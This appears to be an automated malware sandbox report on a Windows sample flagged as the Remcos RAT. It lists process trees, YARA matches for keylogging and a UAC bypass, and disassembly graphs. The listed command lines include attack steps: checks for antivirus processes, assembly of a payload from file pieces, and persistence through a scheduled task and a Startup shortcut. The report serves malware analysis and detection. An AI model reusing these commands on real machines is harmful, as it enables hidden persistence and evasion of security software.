                                                                                                    Data Ascii: KaT+ue=TN.w`S'dpq}Mux:aYbHTl'QV0/Kj:w<P|.'/}lFSmK2z8Mly}pfRf^pO<:-!q!U6Hia{CwuZyHO<oq*Xr[-@%)'g>E\LH


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:09:57:04
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:1'651'200 bytes
                                                                                                    MD5 hash:0A8711FA1CB4189AB364C217DB5F3620
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:09:57:20
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                    Imagebase:0xe20000
                                                                                                    File size:2'141'552 bytes
                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.4534757575.00000000096E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000002.00000002.4532919919.0000000006E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:09:57:25
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    Imagebase:0xad0000
                                                                                                    File size:262'432 bytes
                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:09:57:31
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                    Imagebase:0x400000
                                                                                                    File size:1'218'642 bytes
                                                                                                    MD5 hash:8B55759C053EC89DC1EAE85D043441A9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 54%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:09:57:36
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:09:57:36
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:09:57:36
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:tasklist
                                                                                                    Imagebase:0x340000
                                                                                                    File size:79'360 bytes
                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:9
                                                                                                    Start time:09:57:36
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr /I "wrsa opssvc"
                                                                                                    Imagebase:0xf0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:09:57:37
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:tasklist
                                                                                                    Imagebase:0x340000
                                                                                                    File size:79'360 bytes
                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:09:57:37
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                    Imagebase:0xf0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:09:57:39
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c md 88473
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:09:57:39
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:findstr /V "partitionhansenincorporatemichigan" Classics
                                                                                                    Imagebase:0xf0000
                                                                                                    File size:29'696 bytes
                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:14
                                                                                                    Start time:09:57:39
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c copy /b ..\Mat + ..\Customize + ..\Downloadcom + ..\Damn + ..\Stylus + ..\Guarantees + ..\Directories + ..\Alice + ..\Pros + ..\Graham T
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:15
                                                                                                    Start time:09:57:40
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:Defensive.pif T
                                                                                                    Imagebase:0x670000
                                                                                                    File size:943'784 bytes
                                                                                                    MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 5%, ReversingLabs
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:16
                                                                                                    Start time:09:57:40
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:choice /d y /t 5
                                                                                                    Imagebase:0x840000
                                                                                                    File size:28'160 bytes
                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:17
                                                                                                    Start time:09:57:41
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /c schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:18
                                                                                                    Start time:09:57:42
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:09:57:42
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                                                                                                    Imagebase:0x9d0000
                                                                                                    File size:187'904 bytes
                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:20
                                                                                                    Start time:09:57:42
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js"
                                                                                                    Imagebase:0x7ff714c10000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:09:57:42
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & echo URL="C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & exit
                                                                                                    Imagebase:0x790000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:22
                                                                                                    Start time:09:57:43
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:23
                                                                                                    Start time:09:57:43
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                                                                                                    Imagebase:0x180000
                                                                                                    File size:943'784 bytes
                                                                                                    MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 5%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:25
                                                                                                    Start time:09:57:54
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js"
                                                                                                    Imagebase:0x7ff714c10000
                                                                                                    File size:170'496 bytes
                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:26
                                                                                                    Start time:09:57:54
                                                                                                    Start date:19/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                                                                                                    Imagebase:0x180000
                                                                                                    File size:943'784 bytes
                                                                                                    MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:46.9%
                                                                                                      Total number of Nodes:32
                                                                                                      Total number of Limit Nodes:5
                                                                                                      execution_graph 64093 41d9a0 64094 41d9d9 VirtualProtect 64093->64094 64096 41dae7 64094->64096 64097 41daa9 64094->64097 64099 41dacf 64096->64099 64102 41db33 64096->64102 64116 41dad7 ExitProcess ExitProcess ExitProcess ExitProcess ExitProcess 64097->64116 64099->64096 64117 41db1e ExitProcess ExitProcess ExitProcess ExitProcess 64099->64117 64103 41e47b 64102->64103 64106 41ed87 64102->64106 64118 41e5ea ExitProcess ExitProcess ExitProcess 64103->64118 64108 41f486 ExitProcess 64106->64108 64119 407a47 64120 407a4b VirtualProtect 64119->64120 64121 407a93 64120->64121 64122 41647a 64123 4164b3 NtQueryDefaultLocale 64122->64123 64125 416573 64123->64125 64126 417424 NtQueryDefaultLocale 64125->64126 64128 416b17 64125->64128 64132 417b3b 64126->64132 64135 417d2e 64126->64135 64153 416f99 12 API calls 64128->64153 64130 416f91 64154 417c48 6 API calls 64132->64154 64136 417f04 64135->64136 64139 41808b 64135->64139 64155 417f94 ExitProcess ExitProcess ExitProcess ExitProcess ExitProcess 64136->64155 64140 41e47b 64139->64140 64143 41ed87 64139->64143 64156 41e5ea ExitProcess ExitProcess ExitProcess 64140->64156 64145 41f486 ExitProcess 64143->64145 64153->64130

                                                                                                      Executed Functions

                                                                                                      Function 004153C9 Relevance: 47.8, APIs: 1, Strings: 26, Instructions: 597COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 97 4153c9-4153ea 98 415404-415414 97->98 99 4153ec-415402 97->99 101 415323-4153c7 call 415334 call 4153c9 98->101 102 41541a-41542d 98->102 100 415467-41546e 99->100 104 4154b0-4154fc 100->104 105 415470-4154ae 100->105 102->101 103 415433-415443 102->103 107 415451 103->107 108 415445-41544f 103->108 118 41550e 104->118 119 4154fe-415508 104->119 109 415518-415551 105->109 113 41545b-415461 107->113 108->113 116 415e63-416573 call 415ede NtQueryDefaultLocale 109->116 117 415557-4156d1 call 4156b4 call 4156d2 109->117 113->100 149 416573 116->149 150 41673b-416b11 call 416795 call 416b00 116->150 118->109 119->118 122 4152c4-4152e3 119->122 122->109 149->150 151 416579-4165cc 149->151 173 417424-417b35 NtQueryDefaultLocale 150->173 174 416b17-416f98 call 416bc9 call 416c93 call 416f99 150->174 155 4165dd-416602 151->155 160 416604-41660d 155->160 161 41660f 155->161 164 41663e-4166c9 call 41669d 160->164 163 4165ce-4165d7 161->163 161->164 163->155 172 4166da-4166ff 164->172 177 416701-41670a 172->177 178 41670c 172->178 196 417b3b-417bc0 173->196 197 417d2e-417da5 173->197 177->150 178->150 180 4166cb-4166d4 178->180 180->172 199 417bd1-417bdd 196->199 200 417db6-417ddc 197->200 201 417c05-417c2f 199->201 202 417bdf-417bf6 199->202 204 417de9 200->204 205 417dde-417efe call 417e79 200->205 208 417c32-417c4c call 417c48 201->208 206 417c03 202->206 207 417bf8-417c01 202->207 204->200 223 417f04-417f91 call 417f94 205->223 224 41808b-4182ac 205->224 206->199 207->208 235 4182ba-41e475 call 41e0ed 224->235 236 4182ae-4182b4 224->236 245 41ed87-41f488 call 41edfc ExitProcess 235->245 246 41e47b-41e601 call 41e5ea 235->246 236->235 254 41e603-41e60d 246->254 255 41e612-41e65d 246->255 258 41e8ce-41e8f5 call 41e8ee 254->258 263 41e65f-41e669 255->263 264 41e66e-41e674 255->264 268 41e8fa 258->268 263->258 266 41e67a-41e6d2 264->266 270 41e6d9-41e7a0 call 41e6ed 266->270 268->268 273 41e7a2-41e7b8 270->273 274 41e7ba-41e7ca 270->274 276 41e81d-41e824 273->276 274->270 275 41e7d0-41e7e3 274->275 275->270 277 41e7e9-41e7f9 275->277 278 41e866-41e8b2 call 41e87e 276->278 279 41e826-41e864 call 41e837 call 41e854 276->279 281 41e807 277->281 282 41e7fb-41e805 277->282 291 41e8c4 278->291 292 41e8b4-41e8be 278->292 279->258 285 41e811-41e817 281->285 282->285 285->276 291->258 292->266 292->291
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$L$L$R$W$W$_Q$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                                                                                      • API String ID: 0-2950237079
                                                                                                      • Opcode ID: 4e8b6889617123322fb6e9589c3dd4f85b9c853f6981992070ac131e8e8c243d
                                                                                                      • Instruction ID: c73eba886db4386b759bca94f463f3875525854fe7dadaea29238e4a498710e6
                                                                                                      • Opcode Fuzzy Hash: 4e8b6889617123322fb6e9589c3dd4f85b9c853f6981992070ac131e8e8c243d
                                                                                                      • Instruction Fuzzy Hash: F332C1B1D08668CAE7208B24DC44BEAB7B5FF90304F1440FAD84DA7281E7795EC58F66
                                                                                                      Function 0040CFCF Relevance: 47.7, APIs: 1, Strings: 26, Instructions: 408nativeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 293 40cfcf-40d0a1 295 40d0b2-40d0e0 call 40d0e3 293->295 296 40d0a3-40d0ad 293->296 297 40d359-416118 call 40d381 295->297 296->297 303 41615a-4161b8 297->303 304 41611a-416158 297->304 307 4161c2-416573 NtQueryDefaultLocale 303->307 304->307 321 416573 307->321 322 41673b-416b11 call 416795 call 416b00 307->322 321->322 323 416579-4165cc 321->323 345 417424-417b35 NtQueryDefaultLocale 322->345 346 416b17-416f98 call 416bc9 call 416c93 call 416f99 322->346 327 4165dd-416602 323->327 332 416604-41660d 327->332 333 41660f 327->333 336 41663e-4166c9 call 41669d 332->336 335 4165ce-4165d7 333->335 333->336 335->327 344 4166da-4166ff 336->344 349 416701-41670a 344->349 350 41670c 344->350 368 417b3b-417bc0 345->368 369 417d2e-417da5 345->369 349->322 350->322 352 4166cb-4166d4 350->352 352->344 371 417bd1-417bdd 368->371 372 417db6-417ddc 369->372 373 417c05-417c2f 371->373 374 417bdf-417bf6 371->374 376 417de9 372->376 377 417dde-417efe call 417e79 372->377 380 417c32-417c4c call 417c48 373->380 378 417c03 374->378 379 417bf8-417c01 374->379 376->372 395 417f04-417f91 call 417f94 377->395 396 41808b-4182ac 377->396 378->371 379->380 407 4182ba-41e475 call 41e0ed 396->407 408 4182ae-4182b4 396->408 417 41ed87-41f488 call 41edfc ExitProcess 407->417 418 41e47b-41e601 call 41e5ea 407->418 408->407 426 41e603-41e60d 418->426 427 41e612-41e65d 418->427 430 41e8ce-41e8f5 call 41e8ee 426->430 435 41e65f-41e669 427->435 436 41e66e-41e674 427->436 440 41e8fa 430->440 435->430 438 41e67a-41e6d2 436->438 442 41e6d9-41e7a0 call 41e6ed 438->442 440->440 445 41e7a2-41e7b8 442->445 446 41e7ba-41e7ca 442->446 448 41e81d-41e824 445->448 446->442 447 41e7d0-41e7e3 446->447 447->442 449 41e7e9-41e7f9 447->449 450 41e866-41e8b2 call 41e87e 448->450 451 41e826-41e864 call 41e837 call 41e854 448->451 453 41e807 449->453 454 41e7fb-41e805 449->454 463 41e8c4 450->463 464 41e8b4-41e8be 450->464 451->430 457 41e811-41e817 453->457 454->457 457->448 463->430 464->438 464->463
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
